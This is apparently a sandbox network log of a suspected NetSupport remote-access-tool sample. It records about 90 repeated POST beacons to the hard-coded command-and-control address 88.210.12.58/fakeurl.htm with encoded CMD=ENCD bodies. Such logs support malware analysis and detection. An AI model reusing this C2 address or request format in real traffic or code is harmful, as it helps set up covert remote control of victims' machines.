Dec 10, 2024 08:58:42.924700022 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:43.024702072 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:43.124696016 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:43.224000931 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:43.324702024 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:43.428703070 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:43.524991989 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:43.628698111 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:43.728715897 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:43.826996088 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:43.926995039 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:44.028038025 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:44.128001928 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:44.228017092 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:44.328990936 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:44.429085016 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:44.529997110 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:44.631067038 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:44.732016087 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:44.833889961 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:44.934813976 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:45.035696983 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:45.133975983 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:45.234967947 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:45.335975885 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:45.438746929 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:45.536979914 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:45.637986898 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:45.738003016 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:45.839042902 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:45.940006971 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:46.044662952 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:46.145015001 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:46.245003939 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:46.345993042 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:46.445985079 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:46.547034025 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:46.648010969 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:46.747983932 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:46.852698088 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:46.952029943 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:47.050697088 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:47.152702093 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:47.251003027 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:47.351063967 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:47.451067924 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:47.551682949 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:47.656714916 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:47.752707005 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:47.851995945 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:47.953107119 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:48.052998066 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:48.154056072 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:48.861957073 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:48.962486982 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:49.063379049 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:49.163077116 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:49.264707088 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:49.364701033 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:49.466713905 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:49.566730022 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:49.666717052 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:49.766741037 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:49.863979101 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:49.965006113 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:50.064997911 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:50.166013002 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:50.266031981 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:50.365976095 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:50.467017889 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:50.568016052 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:50.668997049 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:50.770056009 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:50.870982885 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:50.972744942 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:51.071979046 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:51.172699928 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:51.328865051 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:51.447338104 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:51.756709099 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:51.853082895 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:51.954009056 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:52.054096937 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:52.154989958 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:52.255978107 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:52.356014967 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:52.455982924 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:52.555993080 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:52.656991005 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:52.757994890 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:52.862757921 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:52.963180065 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 08:58:53.060978889 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
